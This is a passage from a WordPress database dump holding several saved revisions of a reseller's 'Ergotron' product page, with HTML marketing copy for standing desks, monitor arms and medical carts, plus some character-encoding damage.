reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:17:23','2019-09-26 07:17:23','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3519,1,'2019-09-26 15:26:06','2019-09-26 07:26:06','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong>\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:26:06','2019-09-26 07:26:06','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3526,1,'2019-09-26 15:43:33','2019-09-26 07:43:33','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table border=\"0\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:43:33','2019-09-26 07:43:33','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3530,1,'2019-09-26 15:51:13','2019-09-26 07:51:13','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:51:13','2019-09-26 07:51:13','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3531,1,'2019-09-26 15:54:17','2019-09-26 07:54:17','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n      <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n      <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:54:17','2019-09-26 07:54:17','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3532,1,'2019-09-26 15:55:49','2019-09-26 07:55:49','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"40%\">\r\n        <img class=\"wp-image-2486 alignleft\" 